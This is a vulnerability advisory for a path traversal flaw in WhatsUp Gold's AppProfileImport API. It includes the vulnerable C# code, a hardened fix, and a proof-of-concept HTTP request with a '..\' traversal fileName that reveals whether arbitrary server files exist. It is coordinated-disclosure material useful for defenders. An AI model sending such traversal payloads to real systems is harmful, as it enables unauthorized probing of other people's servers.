Talos Vulnerability Report

TALOS-2024-1932

Progress Software Corporation WhatsUp Gold AppProfileImport path traversal vulnerability

June 26, 2024
CVE Number

CVE-2024-5017

SUMMARY

A path traversal vulnerability exists in the AppProfileImport functionality of Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697. A specially crafted HTTP request can lead to information disclosure. An attacker can make an authenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697

PRODUCT URLS

WhatsUp Gold - https://www.whatsupgold.com/

CVSSv3 SCORE

6.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

WhatsUp Gold is a network monitoring and management software developed by Progress. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.

An authenticated user can upload a new application profile definition file (XML) for monitoring by triggering the following action:

Settings -> Application monitoring -> Application and profile setup -> Application Profiles -> Import

Let us take a look at the controller implementation responsible for handling this action:

Apm.UI\Apm\UI\Areas\APM\Controllers\Api\Applications\AppProfileImportController.cs

Line 1 	namespace Apm.UI.Areas.APM.Controllers.Api.Applications
Line 2 	{
Line 3 		public class AppProfileImportController : ApplicationControllerBase
Line 4 		{
Line 5 		
Line 6 		(...)
Line 7 		
Line 8 			public async Task<HttpResponseMessage> Post(string fileName, int uploadOption)
Line 9 			{	
Line 10				
Line 11				(...)
Line 12				
Line 13				if (uploadOption == 0 && File.Exists(getPath(fileName)))
Line 14				{
Line 15					return getResponse(new ResultModel
Line 16					{
Line 17						message = "FILE_EXISTS",
Line 18						success = false
Line 19					});
Line 20				}
Line 21			}			
Line 22			
Line 23			private string getPath(string fileName = null)
Line 24			{
Line 25				string text = HostingEnvironment.MapPath("~/Content/Apm/Import");
Line 26				if (!string.IsNullOrWhiteSpace(fileName))
Line 27				{
Line 28					return Path.Combine(text, fileName);
Line 29				}
Line 30				return text;
Line 31			}		

Apparent from the above is that the fileName argument is fully controlled by the attacker and is passed directly to File.Exists at line 13. There is no path traversal protection inside the getPath function (line 23): the attacker-controlled fileName value is simply joined to the import directory with Path.Combine (line 28), which does not strip or reject ".." components. These conditions allow the attacker to conduct a path traversal attack and check for the existence of any file on the file system.
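The following is an added example, not WhatsUp Gold's code: it reproduces the unsafe getPath() pattern from the listing beside a hardened variant that restricts the result to the import directory. The import root path and the sample file names are assumed values for illustration.

```csharp
using System;
using System.IO;

// Added example, not the vendor's code. Contrasts the advisory's getPath()
// with a variant that keeps the resolved path inside the import directory.
public static class ImportPath
{
    // Stand-in for HostingEnvironment.MapPath("~/Content/Apm/Import") (assumed value).
    private static readonly string ImportRoot = @"C:\inetpub\wwwroot\Content\Apm\Import";

    // Mirrors the advisory's getPath(): Path.Combine does not normalize "..",
    // and if fileName is rooted (e.g. "C:\...") it discards the base directory.
    public static string GetPathUnsafe(string fileName) =>
        string.IsNullOrWhiteSpace(fileName) ? ImportRoot : Path.Combine(ImportRoot, fileName);

    // Hardened variant: accept only a bare file name, then resolve the full path
    // and require it to still start with the import root after normalization.
    public static string GetPathSafe(string fileName)
    {
        if (string.IsNullOrWhiteSpace(fileName))
            throw new ArgumentException("file name required", nameof(fileName));
        if (fileName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0
            || fileName != Path.GetFileName(fileName))
            throw new ArgumentException("file name must not contain path components", nameof(fileName));
        string root = Path.GetFullPath(ImportRoot).TrimEnd(Path.DirectorySeparatorChar)
                      + Path.DirectorySeparatorChar;
        string full = Path.GetFullPath(Path.Combine(root, fileName));
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new ArgumentException("path escapes import directory", nameof(fileName));
        return full;
    }

    public static void Main()
    {
        // Constructed sample inputs: a legitimate profile name, a relative traversal, and a rooted path.
        foreach (var name in new[] { "Apache Web Server-Linux.xml", @"..\..\swapfile.sys", @"C:\Windows\win.ini" })
        {
            Console.WriteLine($"unsafe : {GetPathUnsafe(name)}");
            try { Console.WriteLine($"safe   : {GetPathSafe(name)}"); }
            catch (ArgumentException e) { Console.WriteLine($"safe   : rejected ({e.Message})"); }
        }
    }
}
```

On Windows the unsafe variant yields paths outside the import directory for the second and third inputs, while the hardened variant rejects both before any file-system call is made.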

Exploit Proof of Concept

An attacker needs to be authenticated and send the following request:

REQ

POST /NmConsole/api/core/AppProfileImport?fileName=..\..\..\..\..\..\..\..\swapfile.sys&uploadOption=0 HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------25967750313659734821777115140
Content-Length: 37688
Origin: http://192.168.0.252
Connection: close
Referer: http://192.168.0.252/NmConsole/
Cookie: ASP.NET_SessionId=p5pzkxhx4kilqqvufzxf05se; langid=1033; .ASPXAUTH=A488824F3A736795051CAAE0DDDEE70583758077C846B3D8F8F706975CAC36BC398E5E9D4C0271BC05C2D70FD62F7CC774F6FE917C7F9862B7CEEE71B8557B3C125F06FD92F5C9FB8768C6DD2DD252A3072C5E021874340B90835928157EC9FE
Upgrade-Insecure-Requests: 1

-----------------------------25967750313659734821777115140
Content-Disposition: form-data; name="filefield-2438-button"; filename="Apache Web Server-Linux.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<EntityAPMApplication xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Name>Apache Server</Name>
  <Description>Monitors the health and performance of Apache Web Server on Linux. Specify non-standard port in the Attributes section below. Requires SNMP enabled on the Linux system hosting Apache Web Server and access to the Apache server-status web page.</Description>
  <ApplicationID>102</ApplicationID>
  <ApplicationType>
    <Name>Apache HTTP Server</Name>
    <Description>Apache</Description>
    <ApplicationTypeID>1009</ApplicationTypeID>
    <IconPath>apache.png</IconPath>
  </ApplicationType>
  (...)

-----------------------------25967750313659734821777115140--

RESP

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 12:09:28 GMT
Connection: close
Content-Length: 41

{"success":false,"message":"FILE_EXISTS"}

If checked file does not exist the server returns the following response:

RESP

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 11:58:40 GMT
Connection: close
Content-Length: 56

<Error><Message>An error has occurred.</Message></Error>

TIMELINE

2024-02-07 - Initial Vendor Contact
2024-02-12 - Vendor Disclosure
2024-06-25 - Vendor Patch Release
2024-06-26 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.